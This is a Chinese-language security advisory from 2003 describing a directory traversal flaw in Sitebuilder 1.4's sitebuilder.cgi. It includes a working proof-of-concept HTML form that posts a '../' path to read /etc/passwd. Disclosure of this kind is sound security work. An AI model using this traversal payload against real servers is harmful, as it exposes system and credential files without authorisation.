Sitebuilder sitebuilder.cgi远程目录遍历漏洞发布时间:2003-09-01 更新时间:2003-09-01 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:8521 受影响系统 Sitebuilder Sitebuilder 1.4详细描述 Sitebuilder的sitebuilder.cgi的脚本存在输入验证漏洞,远程攻击者可以在输入的参数中插入"../"字串,可能以Web进程的权限遍历服务器目录,访问到任意有权限读取的文件。 测试代码 <html><body><p><center> <b>Mein 31337 Exploit :-P</b><br> <form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" method=POST> <input type="hidden" name="username" value="targetuser"> <input type="hidden" name="password" value="targetpassword"> <input type="hidden" name="selectedpage" value="../../../../../../../../../../etc/passwd"> <p><input type="submit" name="action" value="Yes - Use Advanced Editor"> <p><input type="submit" value="Return to Site Builder"> </form> </center></body></html> 解决方案 厂商还未提供解决方案。 相关信息 Directory Traversal in SITEBUILDER - v1.4 http://archives.neohapsis.com/archives/bugtraq/2003-09/0011.html |
